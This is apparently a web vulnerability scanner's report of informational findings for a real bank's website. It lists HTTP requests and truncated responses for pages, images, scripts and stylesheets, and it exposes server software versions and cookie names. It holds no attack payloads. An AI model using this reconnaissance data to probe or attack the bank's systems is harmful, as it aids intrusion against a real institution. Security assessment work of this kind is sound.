| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /personal_banking/open | 
| GET /personal_banking/open Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Cache-Control: private Date: Mon, 16 May 2011 15:17:19 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 27115 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><titl ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /virtualMedia/img1213.gif | 
| GET /virtualMedia/img1213.gif HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Length: 576 Content-Type: image/gif Last-Modified: Wed, 08 Oct 2008 15:00:23 GMT Accept-Ranges: bytes ETag: "304ced965629c91:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:29 GMT GIF89ap...........xa..... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /virtualMedia/img2020.gif | 
| GET /virtualMedia/img2020.gif HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Length: 504 Content-Type: image/gif Last-Modified: Mon, 11 Jan 2010 16:27:14 GMT Accept-Ranges: bytes ETag: "107312efda92ca1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:18 GMT GIF89aW........V.....g.. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /virtualMedia/img2027.gif | 
| GET /virtualMedia/img2027.gif HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Length: 2300 Content-Type: image/gif Last-Modified: Tue, 12 Jan 2010 19:30:31 GMT Accept-Ranges: bytes ETag: "10d07ab4bd93ca1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:28 GMT GIF89a................ppp ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /virtualMedia/img2028.gif | 
| GET /virtualMedia/img2028.gif HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Length: 77 Content-Type: image/gif Last-Modified: Tue, 12 Jan 2010 19:36:06 GMT Accept-Ranges: bytes ETag: "f02aff7bbe93ca1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:28 GMT GIF89a .............i....!...... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /virtualMedia/img243.gif | 
| GET /virtualMedia/img243.gif HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Length: 411 Content-Type: image/gif Last-Modified: Mon, 30 Apr 2007 18:26:29 GMT Accept-Ranges: bytes ETag: "0dc812558bc71:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:36 GMT GIF89a?................. ..A!.8^...!.v....1.O..0.{ ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /virtualMedia/img422.gif | 
| GET /virtualMedia/img422.gif HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Length: 490 Content-Type: image/gif Last-Modified: Tue, 24 Jul 2007 15:32:21 GMT Accept-Ranges: bytes ETag: "a044c1d37cec71:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:18 GMT GIF89aZ..............f..w ...d .X!.F.q.....62........1.. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /virtualMedia/img506.gif | 
| GET /virtualMedia/img506.gif HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Length: 4606 Content-Type: image/gif Last-Modified: Wed, 26 Sep 2007 18:49:52 GMT Accept-Ranges: bytes ETag: "5032cc56e0c81:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:29 GMT GIF89a..<.........(...f. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /virtualMedia/img537.gif | 
| GET /virtualMedia/img537.gif HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Length: 60 Content-Type: image/gif Last-Modified: Thu, 04 Oct 2007 13:16:53 GMT Accept-Ranges: bytes ETag: "f0bc93d4886c81:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:14 GMT GIF89a.. .....f..........!......., | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /virtualMedia/img563.gif | 
| GET /virtualMedia/img563.gif HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.regions.com | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Set-Cookie: www.regions.com-http Content-Length: 532 Content-Type: image/gif Last-Modified: Tue, 16 Oct 2007 11:59:15 GMT Accept-Ranges: bytes ETag: "903819f9ebfc81:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:24:05 GMT GIF89a`........V.....x.. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /virtualMedia/img588.gif | 
| GET /virtualMedia/img588.gif HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Length: 1168 Content-Type: image/gif Last-Modified: Wed, 17 Oct 2007 20:22:13 GMT Accept-Ranges: bytes ETag: "20183067fb10c81:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:13 GMT GIF89a.........@`..u.0... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /virtualMedia/img828.gif | 
| GET /virtualMedia/img828.gif HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Length: 1201 Content-Type: image/gif Last-Modified: Mon, 28 Jan 2008 17:02:22 GMT Accept-Ranges: bytes ETag: "60eec48ccf61c81:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:14 GMT GIF89a7.........`..u.0..p ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /virtualmedia/img240.gif | 
| GET /virtualmedia/img240.gif HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.regions.com Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Length: 1953 Content-Type: image/gif Last-Modified: Fri, 27 Apr 2007 20:27:22 GMT Accept-Ranges: bytes ETag: "c0b776a89c71:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:48:15 GMT GIF89aX........i.UH~vI... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /virtualmedia/img265.gif | 
| GET /virtualmedia/img265.gif HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Length: 2126 Content-Type: image/gif Last-Modified: Fri, 11 May 2007 21:16:37 GMT Accept-Ranges: bytes ETag: "c03e2a91194c71:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:31 GMT GIF89ap.!....Z........{{ s.................. ....33.........fff.dd.... .......aa.::.......uu.... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /virtualmedia/img286.jpg | 
| GET /virtualmedia/img286.jpg HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://phx.corporate-ir Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Length: 30909 Content-Type: image/jpeg Last-Modified: Thu, 17 May 2007 17:07:11 GMT Accept-Ranges: bytes ETag: "207831cfa598c71:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:52:31 GMT ......JFIF.....H.H..... ....'.. ....'.Adobe Photoshop CS3 Windows.2007:05:17 10:31:19......... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /wrapperHeader.aspx | 
| GET /wrapperHeader.aspx?p=477 HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.regions.com Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Cache-Control: private Date: Mon, 16 May 2011 15:52:29 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 12625 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><titl ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | / | 
| GET / HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Cache-Control: private Date: Mon, 16 May 2011 15:42:00 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Vary: Accept-Encoding Content-Length: 27843 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><titl ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /App_Themes/2010/Ems.css | 
| GET /App_Themes/2010/Ems.css HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.regions.com/ Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Set-Cookie: www.regions.com-ssl Content-Type: text/css Last-Modified: Wed, 09 Mar 2011 20:07:58 GMT Accept-Ranges: bytes ETag: "02323af95decb1:0" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:42:01 GMT Content-Length: 21952 .../********************* /* Web Channel Services: Base /************************ .foo{} /************************ /* HTML General /************************ body, h ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /App_Themes/2010/img | 
| GET /App_Themes/2010/img Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.regions.com Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Set-Cookie: www.regions.com-ssl Content-Length: 799 Content-Type: image/gif Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT Accept-Ranges: bytes ETag: "08edcc72c5bcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:42:05 GMT GIF89a.....`............. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /App_Themes/2010/img | 
| GET /App_Themes/2010/img Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Content-Length: 9597 Content-Type: image/png Last-Modified: Mon, 04 Apr 2011 20:18:00 GMT Accept-Ranges: bytes ETag: "08cb2645f3cb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:16:21 GMT .PNG . ...IHDR...~.........D...... .J.........a..r...[.I."M. T\....a....-. ..,... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /App_Themes/2010/img | 
| GET /App_Themes/2010/img Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.regions.com Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Set-Cookie: www.regions.com-ssl Content-Length: 9783 Content-Type: image/gif Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT Accept-Ranges: bytes ETag: "08edcc72c5bcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:42:06 GMT GIF89a..^.......Y....T.. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /Img/sm_558800_oo.gif | 
| GET /Img/sm_558800_oo.gif HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.regions.com/ Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Set-Cookie: www.regions.com-ssl Content-Length: 597 Content-Type: image/gif Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT Accept-Ranges: bytes ETag: "08edcc72c5bcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:42:00 GMT GIF89a . ....fff...!..NETSCAPE2.0. .!.. ....,...... ...........s.M. .!.. ....,...... .... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /JS/cmbd-jquery.min.js | 
| GET /JS/cmbd-jquery.min.js HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.regions.com/ Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Set-Cookie: www.regions.com-ssl Content-Length: 73452 Content-Type: application/x-javascript Last-Modified: Wed, 27 Apr 2011 18:41:00 GMT Accept-Ranges: bytes ETag: "04635a7a5cc1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:42:01 GMT ...//*********** jquery-1.4.2.min.js ******* (function(A,w){function ma(){if(!c.isReady){try{s ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /JS/loadMedia.min.js | 
| GET /JS/loadMedia.min.js HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.regions.com/ Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Set-Cookie: www.regions.com-ssl Content-Type: application/x-javascript Last-Modified: Tue, 05 Apr 2011 18:24:58 GMT Accept-Ranges: bytes ETag: "039b9c4bef3cb1:0" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:42:01 GMT Content-Length: 35261 ...var agt=navigator.userAgent ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /favicon.ico | 
| GET /favicon.ico HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Set-Cookie: www.regions.com-ssl Content-Length: 3262 Content-Type: image/x-icon Last-Modified: Tue, 21 Dec 2010 20:53:00 GMT Accept-Ranges: bytes ETag: "01e6fd51a1cb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:42:06 GMT ...... ..............(... ...@..................... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /js/_bt.js | 
| GET /js/_bt.js HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.regions.com/ Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Set-Cookie: www.regions.com-ssl Content-Type: application/x-javascript Last-Modified: Fri, 15 Apr 2011 14:08:58 GMT Accept-Ranges: bytes ETag: "0b994a976fbcb1:0" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:42:00 GMT Content-Length: 990 //if bt_test is true before executing this script the iframe will load on uat // //if bt_extra is declared as an associative array before executing this script all members of the array will be added ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /js/wtbase.js | 
| GET /js/wtbase.js HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.regions.com/ Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Set-Cookie: www.regions.com-ssl Content-Type: application/x-javascript Last-Modified: Fri, 15 Apr 2011 14:09:58 GMT Accept-Ranges: bytes ETag: "0ff57cd76fbcb1:0" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:42:02 GMT Content-Length: 13718 function DcsInit(){ this.dcsid="dcs4b71f this.domain="statse this.enabled=true; this.exre=(function(){ if (window.RegExp){ return(new RegExp( ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /personal_banking.rf | 
| GET /personal_banking.rf HTTP/1.1 Host: www.regions.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Cache-Control: private Date: Mon, 16 May 2011 15:19:42 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Vary: Accept-Encoding Content-Length: 27887 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><titl ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /virtualMedia/img2612.jpg | 
| GET /virtualMedia/img2612.jpg HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Content-Length: 38403 Content-Type: image/jpeg Last-Modified: Tue, 10 May 2011 16:53:30 GMT Accept-Ranges: bytes ETag: "e030abca32fcc1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:16:24 GMT ......JFIF.....d.d..... . ......................... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /virtualMedia/img3090.jpg | 
